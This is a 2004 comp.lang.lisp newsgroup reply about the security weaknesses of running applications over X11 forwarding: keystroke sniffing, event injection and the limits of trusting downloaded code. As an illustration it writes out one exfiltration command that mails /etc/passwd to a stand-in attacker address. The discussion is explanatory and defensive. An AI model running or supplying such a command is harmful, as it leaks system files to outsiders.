Subject: Re: Ye Old Time Sharing System
From: (Rob Warnock)
Date: Tue, 23 Mar 2004 07:34:30 -0600
Newsgroups: comp.lang.lisp
Message-ID: <>
David Steuber  <> wrote:
| I guess the biggest problem with distributing an application via the
| X11 protocol is the dearth of X11 servers on clients compared to HTTP
| clients.  X11 forwarding also has to work to deal with such things as
| firewalls and NAT.

And security, which is almost impossible to get around unless *you*
securely own both ends of the connection. That is, any host that you
allow unrestricted connections to your local X server can sniff keystrokes
(including passwords), insert events into other windows ("Hmmm... there's
an xterm that's currently iconified and not doing anything. Let's get it
to do a 'cat /etc/passwd | mail badguy@cracker.dom'"), and other nasty

Using MTI-MAGIC-COOKIE-1 authentication helps, as does using X *only*
over SSH tunnels, but even then a malignant sysadmin on the remote host

When it comes down to it, that's the fundamental problem with *all*
proposals for putting "smart" code on the client (or user) side of
the net: You the user have to "trust" the code that you downloaded.
Well, building a "web of trust" that means more than a politician's
promise is a *VERY* hard thing to do. Every day there are examples
of "Oops! We didn't know it could do that!" Just read "comp.risks"...


Rob Warnock			<>
627 26th Avenue			<URL:>
San Mateo, CA 94403		(650)572-2607